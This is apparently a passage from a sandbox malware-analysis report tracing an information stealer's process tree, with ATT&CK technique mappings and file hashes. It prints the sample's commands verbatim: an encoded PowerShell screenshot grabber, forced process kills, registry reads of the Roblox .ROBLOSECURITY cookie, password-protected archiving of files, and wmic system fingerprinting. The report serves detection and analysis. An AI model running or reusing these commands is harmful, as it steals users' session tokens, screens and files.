      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:5860
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3508
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kddhzoe1\kddhzoe1.cmdline"
        6⤵
        
        PID:3960
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES459F.tmp" "c:\Users\Admin\AppData\Local\Temp\kddhzoe1\CSC32CCC31AB5054C8CAFFA355A18369AB0.TMP"
        7⤵
        
        PID:6072
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe" /v DisplayIcon"
      4⤵
      PID:5304
    - - C:\Windows\system32\reg.exe
        
        reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe" /v DisplayIcon
        5⤵
        
        PID:5420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2444
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6080
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5528
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5632
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2600
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2444
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5680
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6096
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5528
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4796"
      4⤵
      PID:5680
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4796
        5⤵
        Kills process with taskkill
        
        PID:1328
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1908"
      4⤵
      PID:5868
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1908
        5⤵
        Kills process with taskkill
        
        PID:5516
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2080"
      4⤵
      PID:5568
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2080
        5⤵
        Kills process with taskkill
        
        PID:5360
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4084"
      4⤵
      PID:1836
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4084
        5⤵
        Kills process with taskkill
        
        PID:4596
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 984"
      4⤵
      PID:5956
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5304
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 984
        5⤵
        Kills process with taskkill
        
        PID:5256
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3412"
      4⤵
      PID:5152
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3412
        5⤵
        Kills process with taskkill
        
        PID:4336
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4680"
      4⤵
      PID:6004
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4680
        5⤵
        Kills process with taskkill
        
        PID:5364
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3884"
      4⤵
      PID:5500
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3884
        5⤵
        Kills process with taskkill
        
        PID:2460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2584"
      4⤵
      PID:5412
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2584
        5⤵
        Kills process with taskkill
        
        PID:5600
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:4124
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        
        PID:5208
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:2948
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        
        PID:3620
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI57202\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\6KCnx.zip" *"
      4⤵
      PID:1572
    - - C:\Users\Admin\AppData\Local\Temp\_MEI57202\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI57202\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\6KCnx.zip" *
        5⤵
        
        PID:1188
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:2580
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:3768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:5348
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:5300
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:1096
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:4472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:1524
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        
        PID:4668

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2176

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2520

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:6080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
4b4f91fa1b362ba5341ecb2836438dea

SHA1
9561f5aabed742404d455da735259a2c6781fa07

SHA256
d824b742eace197ddc8b6ed5d918f390fde4b0fbf0e371b8e1f2ed40a3b6455c

SHA512
fef22217dcdd8000bc193e25129699d4b8f7a103ca4fe1613baf73ccf67090d9fbae27eb93e4bb8747455853a0a4326f2d0c38df41c8d42351cdcd4132418dac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
eaa3db555ab5bc0cb364826204aad3f0

SHA1
a4cdfaac8de49e6e6e88b335cfeaa7c9e3c563ca

SHA256
ef7baeb1b2ab05ff3c5fbb76c2759db49294654548706c7c8e87f0cde855b86b

SHA512
e13981da51b52c15261ecabb98af32f9b920651b46b10ce0cc823c5878b22eb1420258c80deef204070d1e0bdd3a64d875ac2522e3713a3cf11657aa55aeccd4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
f0ab728599ad9d76daebcffe1f58c90c

SHA1
de74a4641af8df6a76f7a5a8c3632c3a1c86b998

SHA256
09c029dec43b283ac8fc78005e4b97ecbbec0e780885636fe60e3ed82ade5eec

SHA512
29ffa80cbaeb044871cac46536592e5660b2ce6b54f9e166540b6b2592c68d7c16f54c53f5923ef29359caa52bd56d76b50f2ddc1a87b5d5bd9da67b0edd0f97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
13KB

MD5
e399d7c1fa891014643a33bc351d4f66

SHA1
0e904101bfcb698f024427e2aa9f12ef7f0ca427

SHA256
3bc0d2ac701444eeb5f4217643d1f05e0d0ac9bfc29444736140016666aec294

SHA512
6242c288f051b840bdc6524dbeb80e5be26f720503fd9568dc2302301addd05f34258efe0d51b02e8798838effc6569c11d23b467dd84349ab95e940b2a84830

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
579B

MD5
ca3dac1178d10a645e836551a65b0332

SHA1
7fb32ae3ca77810f51265946218125ec1d7e49c6

SHA256
0fa377dfa78c020268face14a750666536e8ba935ac2275ca4c78bacb4d98c16

SHA512
bb5e66de5fe780b39a2521fd628e30fc9a227476bf15c80279cd03240f825e27fce96cd4c9b1ad9f5d72be49b867f9b2b319c45f4822cf01679aedf5c136efbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
ee1b7e096549e0370d75b473d80a750f

SHA1
ba7ecb781122ba08544e315421dfd39fdc70998e

SHA256
323e023eb5256882a1b45eca0d4b405a459da6511c0df30e196601de67d20eb9

SHA512
28df25e0b3e9e6f48891257848a67982e0e9b18ce34af53a71e785ae7d8b264173c351688722c8934ebe879c39c49b71999d9c3abb86f057ff0e2a3b90fbe442

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
ff0f8f889df811fd89d4ae3bd0e3474d

SHA1
3f650a51d91b1a7c106eca302304a0cbc0c90eaa

SHA256
a66ff9170af4cd183532ad791a47d0fe558ad269c30181f16f7ec85e04151041

SHA512
c496cca1c47f3eab1f6ecdefa6aacc30fc5c9c790a95c42b57670594de465f21965e1d6da28e4f4eb4dd692fb8817b4fd173da5322818c074010ab06ff84905e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
a0b1faa21f8fc2ab0c6469ca6c400cdc

SHA1
9e35a4f4e26a50cb7273347f8ce97198e32872ea

SHA256
3e91318c8e4f6a1bc2b21ba1f62390c1cdfa494e78a011a486197b565e5c9080

SHA512
2b2f3cbebc125a4e7121b339abd37f5d370610c09de06b847b75e9aac7ee8ea812be9db6e077b8aea8b19353216de08451df226673adfc2c982adbc866049910

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
fef828baea17d8f52c3baebffb693000

SHA1
01447487d8752c346ddc638f82659b198ecbd02f

SHA256
eadec54929a4c8c75fdecd5db1cb25f7179f0fcb218b55b0a214077b83decf02

SHA512
923558a9a49ea32a2054b2dce73c5e11038f7ccadf66328e1bfc662e040b97f8fb643103ae5eb7bdb1eea69558538a5911dc7b7702a65bcd57d8eea2bb543e5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
6b11adfe7e9427d87e5c50bfb3903e68

SHA1
0bd0b45f1c373c5f3cd60980421a6b6dacaa7869

SHA256
48e75f78fddeedcd7dbb3cb8cbcf0ed48419831fd9732b5992a607ed04f3cf15

SHA512
992939c0088c231f68095c89fcd8919a53a856055972b61bc12d218c155edc82f9d9e4216ab28f8b43c52d6bd0d90e5609c65bff1c2c9739a69892dad9c6d298

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
874B

MD5
b84f0d9cb40d200c7d43c9d1b2f7b62a

SHA1
98ae840da01984f1b5f02cc4daa1fcf7c85de4df

SHA256
e6385ee284ef1d9188a608848e152a2a7da3f391a940afc92e3d15505cea9ced

SHA512
b9bdee34d78dc5574be3b493d3a7e53f533804fac5e2e29d345ca8a70f88d90012dab9a86160c40d92e413b9d14f0258f1ca397000604da020136045ea7899a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57b45c.TMP

Filesize
874B

MD5
c4d6d125617a4362aed52e85b5abd845

SHA1
18ffa526c11621720760a76500075f2a721942ab

SHA256
5478fbfe96a9b100649a029010726a8f636c6a32d811f6408ea3cc73a51fc0c1

SHA512
fdbfe9d400c34f958a5df3eee7cffa54df600e76e601acafa2804ee8d67a4a9928efbe25b0cdbf15a5ebe4b713a2bf5157f420fb72806cb6b53919acaa9eadde

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
141ea57dafe9e7167dee9ae05acbd6ef

SHA1
0aa27d4da9393d976d12c7caa866d644a776082c

SHA256
33b13eb17285e779ebeeecf90fb641d41751e34b83edbb93cb60e5c6d2b14de6

SHA512
7b30317f346db8c454f3d1b049c52baa8d07a1bc1d31b166e7863e31423eb8c61fa1854ad5024bf8b65fd376ef9ff6799b327c772cfb4afc342534ca95b3c027

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
4e4d6d8f77937a931c7afec2c0279be2

SHA1
ac25de37f9c8deceaff289a480ad91243e1163fa

SHA256
c58cfbe86d5ccc7db01a35087fcd3a91f9d79258e084412ce68a28ed8c246e70

SHA512
